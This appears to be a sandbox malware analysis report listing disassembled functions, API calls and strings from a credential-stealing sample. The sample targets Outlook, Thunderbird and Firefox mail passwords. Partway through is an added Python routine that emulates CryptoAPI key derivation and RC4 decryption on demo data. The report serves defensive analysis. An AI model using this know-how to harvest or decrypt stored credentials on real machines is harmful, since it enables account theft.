                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fadcbaaacaeb9138fef9dc8452ad8ac79757f966f14a2d9034369e41b7735666
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 50C092349109018FD62C9F38DC5A52A77A0BF5A3343B40F6CA0F3D20F0E778A842CA08
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • RegOpenKeyExA.KERNELBASE(00401C4B,00401C4B,00000000,00020019,?,00401C4B,?,?,?), ref: 00410424
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Open
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 71445658-0
                                                                                                                                                                                                                      • Opcode ID: 21d2125e3753e601ca1b20deba59a5865270c48a78257e55b283f3ccc3de6cc0
                                                                                                                                                                                                                      • Instruction ID: 9e85f5290c785a84adc9a585aa79e4266a03e2402c05001ad2ac5d5d83fda341
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 21d2125e3753e601ca1b20deba59a5865270c48a78257e55b283f3ccc3de6cc0
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 40C09B39544301BFDE114F40FD05F09BB61BB84F05F504414B244240B182714414EB57
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

APIs
• GetFileAttributesA.KERNELBASE(?,00401EDD,?), ref: 00406D23
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: 2ea5a109eb267fb6083926362ae3c8176b926bbef034cd1da8757df3be379db2
• Instruction ID: 1a596b20ff26773e60743876e99a20c5f0c5c53ebb8dbfb842e64d2fd6ed3a7e
• Opcode Fuzzy Hash: 2ea5a109eb267fb6083926362ae3c8176b926bbef034cd1da8757df3be379db2
• Instruction Fuzzy Hash: 76B012792108005FCF1807349C4904D35506F45631760073CF033C00F0D720CC60BA00
Uniqueness

Uniqueness Score: -1.00%

APIs
• LoadLibraryA.KERNEL32(advapi32.dll,?,00404A6B,?,00404981,?,?,00000000,?,00000000,?), ref: 004047D5
• GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004047E9
• GetProcAddress.KERNEL32(0045175C,CryptReleaseContext), ref: 004047F5
• GetProcAddress.KERNEL32(0045175C,CryptCreateHash), ref: 00404801
• GetProcAddress.KERNEL32(0045175C,CryptGetHashParam), ref: 0040480D
• GetProcAddress.KERNEL32(0045175C,CryptHashData), ref: 00404819
• GetProcAddress.KERNEL32(0045175C,CryptDestroyHash), ref: 00404825
• GetProcAddress.KERNEL32(0045175C,CryptDecrypt), ref: 00404831
• GetProcAddress.KERNEL32(0045175C,CryptDeriveKey), ref: 0040483D
• GetProcAddress.KERNEL32(0045175C,CryptImportKey), ref: 00404849
• GetProcAddress.KERNEL32(0045175C,CryptDestroyKey), ref: 00404855
Strings
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: AddressProc$LibraryLoad
• String ID: CryptAcquireContextA$CryptCreateHash$CryptDecrypt$CryptDeriveKey$CryptDestroyHash$CryptDestroyKey$CryptGetHashParam$CryptHashData$CryptImportKey$CryptReleaseContext$advapi32.dll
• API String ID: 2238633743-192783356
• Opcode ID: cdc1f63c0c232f946f357b8b2aefe836e2e50651c8dba3e6496bd37ee8642a43
• Instruction ID: 96d911507a8a1b00aef88e3b883ab5eac538cf63a3166b36270edd586bbeed94
• Opcode Fuzzy Hash: cdc1f63c0c232f946f357b8b2aefe836e2e50651c8dba3e6496bd37ee8642a43
• Instruction Fuzzy Hash: A501C974940744AFDB31AF769C09E06BEF1EFA97003224D2EE2C553650D77AA010DE49
Uniqueness

Uniqueness Score: -1.00%
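The function above resolves the full CryptoAPI chain at run time (LoadLibraryA("advapi32.dll") followed by GetProcAddress for CryptAcquireContextA, CryptCreateHash, CryptHashData, CryptDeriveKey, CryptDecrypt and the matching release/destroy calls), so none of these names appear in the import table. That chain is the classic "hash a secret, derive a symmetric key from the hash, decrypt a stored blob" sequence used by password recovery code. The Python below is an added example, not code from the sample or from Joe Sandbox: it reproduces the documented CryptDeriveKey derivation and the RC4 decrypt step so a recovered blob can be decrypted offline on a Linux analysis box. The report does not show which hash algorithm, cipher or key length the sample passes to these functions; MD5, RC4 and a 128-bit key are assumptions here, chosen because they need no third-party library. The 40-bit RC4 salt case and the SHA-2 hash case of CryptDeriveKey are not covered.

```python
"""Emulation of the CryptCreateHash -> CryptHashData -> CryptDeriveKey ->
CryptDecrypt chain resolved by the function above. Added example; the
algorithm choices (MD5 / RC4 / 16-byte key) are assumptions, not values
taken from the report."""
import hashlib


def crypt_derive_key(hash_name: str, base_data: bytes, key_len: int,
                     block_cipher: bool) -> bytes:
    """Derive a key the way CryptDeriveKey does (Microsoft's documented
    remarks for CryptDeriveKey):

    * stream cipher such as CALG_RC4: the first key_len bytes of H(base_data);
    * AES / 3DES with a non-SHA-2 hash (block_cipher=True):
        inner = H(H(base_data) XOR 0x36, padded with 0x36 to 64 bytes)
        outer = H(H(base_data) XOR 0x5C, padded with 0x5C to 64 bytes)
        key   = (inner + outer)[:key_len]
    """
    h = hashlib.new(hash_name, base_data).digest()
    if not block_cipher:
        if key_len > len(h):
            raise ValueError("requested key is longer than the hash output")
        return h[:key_len]
    ipad = bytes(b ^ 0x36 for b in h) + b"\x36" * (64 - len(h))
    opad = bytes(b ^ 0x5C for b in h) + b"\x5C" * (64 - len(h))
    stream = hashlib.new(hash_name, ipad).digest() + hashlib.new(hash_name, opad).digest()
    if key_len > len(stream):
        raise ValueError("requested key is longer than the expanded hash output")
    return stream[:key_len]


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA). Encryption and decryption are the same operation."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for c in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(c ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def decrypt_with_derived_key(secret: bytes, ciphertext: bytes,
                             hash_name: str = "md5", key_len: int = 16) -> bytes:
    """CryptDecrypt equivalent for the assumed MD5 + RC4 configuration."""
    return rc4(crypt_derive_key(hash_name, secret, key_len, block_cipher=False), ciphertext)


# Constructed demo data (not recovered from the sample): the "secret" stands in
# for whatever the sample feeds to CryptHashData, and CIPHERTEXT is produced
# here with the same derived key so the round trip is checkable offline.
SECRET = b"constructed-secret"
PLAINTEXT = b"pop3 password: hunter2"
CIPHERTEXT = rc4(crypt_derive_key("md5", SECRET, 16, block_cipher=False), PLAINTEXT)

if __name__ == "__main__":
    print(decrypt_with_derived_key(SECRET, CIPHERTEXT))
```

When emulating a real blob, take the hash algorithm, cipher and key length from the CryptCreateHash and CryptDeriveKey arguments in the API trace rather than guessing them; CryptDecrypt with a block cipher additionally depends on the key's mode and IV parameters, which this example does not model.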

APIs
  • Part of subcall function 00410411: RegOpenKeyExA.KERNELBASE(00401C4B,00401C4B,00000000,00020019,?,00401C4B,?,?,?), ref: 00410424
  • Part of subcall function 00410452: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C69,?,?,?,?,00401C69,?,?,?), ref: 0041046D
  • Part of subcall function 0041042B: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402928,?,?,?,?,00402928,?,?), ref: 0041044A
  • Part of subcall function 00410475: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,0040264A,?), ref: 0041048B
• _mbscpy.MSVCRT ref: 00402EBC
• _mbscpy.MSVCRT ref: 00402ECF
• _mbscpy.MSVCRT ref: 00402F5C
• _mbscpy.MSVCRT ref: 00402F69
• RegCloseKey.ADVAPI32(?), ref: 00402FC3
Strings
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: _mbscpy$QueryValue$CloseOpen
• String ID: DisplayName$EmailAddress$PopAccount$PopLogSecure$PopPassword$PopPort$PopServer$SMTPAccount$SMTPLogSecure$SMTPPassword$SMTPPort$SMTPServer
• API String ID: 52435246-1534328989
• Opcode ID: 8606da5831358c67b4a99ee8b6ad117f72868ee6eb846870c269daa592ef00d8
• Instruction ID: 400a04a5c8efacb9c4641a70875855bf6b7e4888715d32951425251a7c23a99d
• Opcode Fuzzy Hash: 8606da5831358c67b4a99ee8b6ad117f72868ee6eb846870c269daa592ef00d8
• Instruction Fuzzy Hash: 575130B1900118BBEF11EB51DD41FEE777CAF04754F5080A7BA0CA6192DBB89B858F98
Uniqueness

Uniqueness Score: -1.00%

APIs
• EmptyClipboard.USER32 ref: 00406BA4
  • Part of subcall function 00406A9F: CreateFileA.KERNEL32(R7D,80000000,00000001,00000000,00000003,00000000,00000000,0044368E,?,.8D,00443752,?,?,*.oeaccount,.8D,?), ref: 00406AB1
• GetFileSize.KERNEL32(00000000,00000000), ref: 00406BC1
• GlobalAlloc.KERNEL32(00002000,00000001), ref: 00406BD2
• GlobalFix.KERNEL32(00000000), ref: 00406BDF
• ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BF2
• GlobalUnWire.KERNEL32(00000000), ref: 00406C01
• SetClipboardData.USER32(00000001,00000000), ref: 00406C0A
• GetLastError.KERNEL32 ref: 00406C12
• CloseHandle.KERNEL32(?), ref: 00406C1E
• GetLastError.KERNEL32 ref: 00406C29
• CloseClipboard.USER32 ref: 00406C32
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleReadSizeWire
• String ID:
• API String ID: 2565263379-0
• Opcode ID: 1b6e565173029c6444be00b6b2d36f782b825a097f2130a1a97e673a6d3a71af
• Instruction ID: 428d7c431cb1422a1915013c6704b220f4cf118cce9454ff27e0024ace88079b
• Opcode Fuzzy Hash: 1b6e565173029c6444be00b6b2d36f782b825a097f2130a1a97e673a6d3a71af
• Instruction Fuzzy Hash: E2114239904605FFEF105FA4DC4CB9E7FB8EB46755F104035F542E1192DB7489508A69
Uniqueness

Uniqueness Score: -1.00%

APIs
• EmptyClipboard.USER32 ref: 00406C45
• strlen.MSVCRT ref: 00406C52
• GlobalAlloc.KERNEL32(00002000,00000001,?,?,?,?,0040C0BB,?), ref: 00406C61
• GlobalFix.KERNEL32(00000000), ref: 00406C6E
• memcpy.MSVCRT ref: 00406C77
• GlobalUnWire.KERNEL32(00000000), ref: 00406C80
• SetClipboardData.USER32(00000001,00000000), ref: 00406C89
• CloseClipboard.USER32 ref: 00406C99
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: ClipboardGlobal$AllocCloseDataEmptyWirememcpystrlen
• String ID:
• API String ID: 2315226746-0
• Opcode ID: ee3e5d8b8b8103545cd3f6b58303d98c31de17f75192de6e2f85eb2c234adac6
• Instruction ID: 8edcd2d2b4f986e571765b3eebb92d88a59871b3330cf63fe52768e208e874e1
• Opcode Fuzzy Hash: ee3e5d8b8b8103545cd3f6b58303d98c31de17f75192de6e2f85eb2c234adac6
• Instruction Fuzzy Hash: 23F0E93B5047186BD7102FA1BC4CE6BBB2CDB86F96B050039FA0AD6253DE755C0447B9
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: PrivateProfileString_mbscmpstrlen
• String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
• API String ID: 3963849919-1658304561
• Opcode ID: 2d5d1f6d072cf84e5318d5093311add326f10471678b07e4c74f475588d4acf4
• Instruction ID: 1b90a5eb0bf433dfd26fdc49de6d86aad9c02d214cf5b02dd481862667588e5e
• Opcode Fuzzy Hash: 2d5d1f6d072cf84e5318d5093311add326f10471678b07e4c74f475588d4acf4
• Instruction Fuzzy Hash: EF21F47180151C6EDB51EB11DD82FEE777C9B44705F4004ABBA09B1092DBBC6BC68E59
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??2@??3@memcpymemset
                                                                                                                                                                                                                      • String ID: E$ E$ E
                                                                                                                                                                                                                      • API String ID: 1865533344-1090515111
                                                                                                                                                                                                                      • Opcode ID: 9da058ee93427dafffafa38840fabb32167184d36f2f077627326be0874b02b0
                                                                                                                                                                                                                      • Instruction ID: 87a0be596659d04b7e64c8373dbe8b7d58709088cb568d7826d55e868489c559
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9da058ee93427dafffafa38840fabb32167184d36f2f077627326be0874b02b0
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0E115A74900209EFCF119F90C905AAE3BB1AF08312F00806AFC156B2A2C7799911DFAA
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0044269A
                                                                                                                                                                                                                      • _strncoll.MSVCRT ref: 004426AA
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 00442726
                                                                                                                                                                                                                      • atoi.MSVCRT ref: 00442737
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000002,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00442763
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ByteCharMultiWide_strncollatoimemcpystrlen
                                                                                                                                                                                                                      • String ID: AElig;$Aacute;$Acirc;$Agrave;$Aring;$Atilde;$Auml;$Ccedil;$ETH;$Eacute;$Ecirc;$Egrave;$Euml;$Iacute;$Icirc;$Igrave;$Iuml;$Ntilde;$Oacute;$Ocirc;$Ograve;$Oslash;$Otilde;$Ouml;$THORN;$Uacute;$Ucirc;$Ugrave;$Uuml;$Yacute;$aacute;$acirc;$acute;$aelig;$agrave;$amp;$apos;$aring;$atilde;$auml;$brvbar;$ccedil;$cedil;$cent;$copy;$curren;$deg;$divide;$eacute;$ecirc;$egrave;$eth;$euml;$frac12;$frac14;$frac34;$gt;$iacute;$icirc;$iexcl;$igrave;$iquest;$iuml;$laquo;$lt;$macr;$micro;$middot;$nbsp;$not;$ntilde;$oacute;$ocirc;$ograve;$ordf;$ordm;$oslash;$otilde;$ouml;$para;$plusmn;$pound;$quot;$raquo;$reg;$sect;$shy;$sup1;$sup2;$sup3;$szlig;$thorn;$times;$uacute;$ucirc;$ugrave;$uml;$uuml;$yacute;$yen;$yuml;
                                                                                                                                                                                                                      • API String ID: 1864335961-3210201812
                                                                                                                                                                                                                      • Opcode ID: 80ec9a29ea78ec2cbe9852ea9064bf10950e9091ede64f5a1b804a11a303e8fe
                                                                                                                                                                                                                      • Instruction ID: 53082eb74af2b51306e1b07bdc149dea26fd0daa9c3b29582cc647e8b6ddbc01
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 80ec9a29ea78ec2cbe9852ea9064bf10950e9091ede64f5a1b804a11a303e8fe
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 90F112B080625CDBFB61CF54D9897DEBBB0EB01308F5881CAD4597B251C7B81A89CF99
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: strcmp$_strcmpi$memcpystrlenstrtoul
                                                                                                                                                                                                                      • String ID: Account_Name$IMAP$IMAP_Port$IMAP_Secure_Connection$IMAP_Server$IMAP_User_Name$NNTP$NNTP_Email_Address$NNTP_Port$NNTP_Secure_Connection$NNTP_Server$NNTP_User_Name$POP3$POP3_Port$POP3_Secure_Connection$POP3_Server$POP3_User_Name$SMTP$SMTP_Email_Address$SMTP_Port$SMTP_Secure_Connection$SMTP_Server$SMTP_User_Name
                                                                                                                                                                                                                      • API String ID: 1714764973-479759155
                                                                                                                                                                                                                      • Opcode ID: a22eaacac348120a4584acb678e178257747be7cf0bf62b2cbe4dd5676c6cf3b
                                                                                                                                                                                                                      • Instruction ID: 5e0940cb4a553810ccd5eed58eee7b2aa7af7a3cc246567a3fd24b3687d2e464
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a22eaacac348120a4584acb678e178257747be7cf0bf62b2cbe4dd5676c6cf3b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AD9191B260C7049AF628BB329D43B9B33D8AF50719F10043FF95AB61C2EE6DB905465D
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040E6BB
                                                                                                                                                                                                                        • Part of subcall function 0040690E: memset.MSVCRT ref: 00406930
                                                                                                                                                                                                                        • Part of subcall function 0040690E: strlen.MSVCRT ref: 0040693B
                                                                                                                                                                                                                        • Part of subcall function 0040690E: strlen.MSVCRT ref: 00406949
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040E70C
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040E728
                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,%@,000000FF,?,00000104,?,?,?,?,?,?,0040EC25,?,00000000), ref: 0040E73F
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000,?,?,?,?,?,?,0040EC25,?), ref: 0040E75E
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040E7C0
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040E7D5
                                                                                                                                                                                                                      • _mbscpy.MSVCRT ref: 0040E83A
                                                                                                                                                                                                                      • _mbscpy.MSVCRT ref: 0040E850
                                                                                                                                                                                                                      • _mbscpy.MSVCRT ref: 0040E866
                                                                                                                                                                                                                      • _mbscpy.MSVCRT ref: 0040E87C
                                                                                                                                                                                                                      • _mbscpy.MSVCRT ref: 0040E892
                                                                                                                                                                                                                      • _mbscpy.MSVCRT ref: 0040E8A8
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040E8C2
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$_mbscpy$ByteCharMultiWidestrlen
                                                                                                                                                                                                                      • String ID: $"$$$$$%@$+$,$/$8$:$e$imap://%s$mailbox://%s$smtp://%s
                                                                                                                                                                                                                      • API String ID: 3137614212-1813914204
                                                                                                                                                                                                                      • Opcode ID: 69a064d0c74a5f80a32c9514a74247ccae5cfcd5772a3df6081ef2e910daae95
                                                                                                                                                                                                                      • Instruction ID: 60cbd65c12865ccb94f157c96bc1922d811664869268201cbad442dfa9876f55
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 69a064d0c74a5f80a32c9514a74247ccae5cfcd5772a3df6081ef2e910daae95
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A9228E218087DA9DDB31D6BC9C456CDBF646B16234F0803DAF1E8BB2D2D7344A46CB66
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _strcmpi$strlen$_strncoll$atoimemset$memcpy
                                                                                                                                                                                                                      • String ID: fullname$hostname$identities$mail.account.account$mail.identity$mail.server$port$server$signon.signonfilename$true$type$useSecAuth$useremail$username
                                                                                                                                                                                                                      • API String ID: 594115653-593045482
                                                                                                                                                                                                                      • Opcode ID: 02ac693aacd5f103a4b76259fedb339b3b15ca4c55630f2bd5c8a753d7842cac
                                                                                                                                                                                                                      • Instruction ID: 1e907043fac54bf2e371806c1eb24ba38ca233ac5dd260cadef0f6990961d541
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 02ac693aacd5f103a4b76259fedb339b3b15ca4c55630f2bd5c8a753d7842cac
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3C71D832804204AEFF14ABA1DD02B9E77B5DF91329F21406FF545B21C1EB7D9A18D64C
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
  • Part of subcall function 0040690E: memset.MSVCRT ref: 00406930
  • Part of subcall function 0040690E: strlen.MSVCRT ref: 0040693B
  • Part of subcall function 0040690E: strlen.MSVCRT ref: 00406949
  • Part of subcall function 004086A5: GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,0040EC43,?,00000000,?,?,?,?,?,?), ref: 004086C3
  • Part of subcall function 004086A5: CloseHandle.KERNEL32(?,?), ref: 0040870D
  • Part of subcall function 00408763: _mbsicmp.MSVCRT ref: 0040879D
• memset.MSVCRT ref: 0040E123
• memset.MSVCRT ref: 0040E138
• _mbscpy.MSVCRT ref: 0040E19F
• _mbscpy.MSVCRT ref: 0040E1B5
• _mbscpy.MSVCRT ref: 0040E1CB
• _mbscpy.MSVCRT ref: 0040E1E1
• _mbscpy.MSVCRT ref: 0040E1F7
• _mbscpy.MSVCRT ref: 0040E20A
• memset.MSVCRT ref: 0040E225
• memset.MSVCRT ref: 0040E23C
  • Part of subcall function 00406582: memset.MSVCRT ref: 004065A3
  • Part of subcall function 00406582: memcmp.MSVCRT ref: 004065CD
• memset.MSVCRT ref: 0040E29D
• memset.MSVCRT ref: 0040E2B4
• memset.MSVCRT ref: 0040E2CB
• sprintf.MSVCRT ref: 0040E2E6
• sprintf.MSVCRT ref: 0040E2FB
• sprintf.MSVCRT ref: 0040E310
• _strcmpi.MSVCRT ref: 0040E326
• _strcmpi.MSVCRT ref: 0040E33F
• _strcmpi.MSVCRT ref: 0040E358
• _strcmpi.MSVCRT ref: 0040E374
Strings
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
• String ID: C@$encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
• API String ID: 4171719235-3249434271
• Opcode ID: b0d5c0670ed8c74d0c8e3b60901706fc2ec35adaa3e3620046f1bbd10783a5e2
• Instruction ID: 4eb083177fa9c3dcba641838e0e399a852ec85db15ddf69852980c8670b79128
• Opcode Fuzzy Hash: b0d5c0670ed8c74d0c8e3b60901706fc2ec35adaa3e3620046f1bbd10783a5e2
• Instruction Fuzzy Hash: EFA16672D04219AEDF10EBA1DC41ADE77BCAF44304F1044BFF645B7181DA38AA988F59
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetDlgItem.USER32(?,000003E9), ref: 0040FDA3
• GetDlgItem.USER32(?,000003E8), ref: 0040FDAF
• GetWindowLongA.USER32(00000000,000000F0), ref: 0040FDBE
• GetWindowLongA.USER32(?,000000F0), ref: 0040FDCA
• GetWindowLongA.USER32(00000000,000000EC), ref: 0040FDD3
• GetWindowLongA.USER32(?,000000EC), ref: 0040FDDF
• GetWindowRect.USER32(00000000,?), ref: 0040FDF1
• GetWindowRect.USER32(?,?), ref: 0040FDFC
• MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0040FE10
• MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0040FE1E
• GetDC.USER32 ref: 0040FE57
• strlen.MSVCRT ref: 0040FE97
• GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 0040FEA8
• ReleaseDC.USER32(?,?), ref: 0040FEF5
• sprintf.MSVCRT ref: 0040FFB5
• SetWindowTextA.USER32(?,?), ref: 0040FFC9
• SetWindowTextA.USER32(?,00000000), ref: 0040FFE7
• GetDlgItem.USER32(?,00000001), ref: 0041001D
• GetWindowRect.USER32(00000000,?), ref: 0041002D
• MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041003B
• GetClientRect.USER32(?,?), ref: 00410052
• GetWindowRect.USER32(?,?), ref: 0041005C
• SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 004100A2
• GetClientRect.USER32(?,?), ref: 004100AC
• SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 004100E4
Strings
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
• String ID: %s:$EDIT$STATIC
• API String ID: 1703216249-3046471546
• Opcode ID: 8a60e0ba97f171743a829e93ce0ff1a0e7cc565a63bc43af7584db32dade8b22
• Instruction ID: 60093129ffb9b10d71bc98ba01756b195f92c815bd96d79b3314cc8c80e42073
• Opcode Fuzzy Hash: 8a60e0ba97f171743a829e93ce0ff1a0e7cc565a63bc43af7584db32dade8b22
• Instruction Fuzzy Hash: 62B1DE71108741AFDB20DF68C985E6BBBE9FF88704F00492EF69992261DB75E804CF56
Uniqueness
Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 004024E7
  • Part of subcall function 00410452: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C69,?,?,?,?,00401C69,?,?,?), ref: 0041046D
• _mbscpy.MSVCRT ref: 00402525
• _mbscpy.MSVCRT ref: 004025EF
Strings
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: _mbscpy$QueryValuememset
• String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
• API String ID: 168965057-606283353
• Opcode ID: d04dcaea7970b63fee6828c7dcfe30098fc49b177350675b76886810d8c329c2
